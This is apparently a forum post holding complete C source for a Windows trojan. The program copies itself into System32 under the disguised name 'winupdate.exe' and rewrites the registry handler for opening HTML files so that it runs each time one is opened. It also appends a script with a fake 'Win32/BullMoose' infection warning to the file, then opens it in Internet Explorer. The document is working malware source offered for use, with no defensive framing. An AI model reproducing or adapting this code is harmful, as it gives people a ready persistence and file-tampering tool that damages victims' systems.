کد:
#define WIN32_LEAN_AND_MEAN
#include <stdio.h>
#include <windows.h>
#include <shellapi.h>
// (Default) "C:\Program Files\Internet Explorer\iexplore.exe" %1
const char InfectString[] = "\n<script>alert(\"Warning: This file has been detected by Windows "
"Defender to be infected with Win32/BullMoose!\");</script>";
int main(int argc, char *argv[])
{
// needed path to program
if(argc==2) {
// set up attributes for normal
SetFileAttributes(argv[1],FILE_ATTRIBUTE_NORMAL);
// open file
FILE *file = fopen(argv[1],"at");
// write to it (string InfectString)
fputs(InfectString,file);
// close file
fclose(file);
//run internet explorer
ShellExecute(NULL,"open","\"C:\\Program Files\\Internet Explorer\\iexplore.exe\"",argv[1],NULL,SW_SHOW);
}
char MyPath[256], CpyPath[256];
// get path to our trojan
GetModuleFileName(NULL,MyPath,sizeof(MyPath));
// get C:\Windows\System32
GetSystemDirectory(CpyPath,sizeof(CpyPath));
// Add to string system32 our trojan reccord C:\Windows\System32\winupdate.exe
strcat(CpyPath,"\\winupdate.exe");
// copy trojan to C:\Windows\System32\ our winupdate.exe
CopyFile(MyPath,CpyPath,FALSE);
// add to string 1% for open with shell extension
strcat(CpyPath," %1");
HKEY Key32;//for registru
// open key in registry
RegOpenKeyEx(HKEY_CLASSES_ROOT,"htmlfile\\shell\\opennew\\command",0,KEY_WRITE,&Key32);
// write our record
RegSetValueEx(Key32,"",0,REG_SZ,CpyPath,strlen(CpyPath));
// close registry
RegCloseKey(Key32);
//end
return 0;
}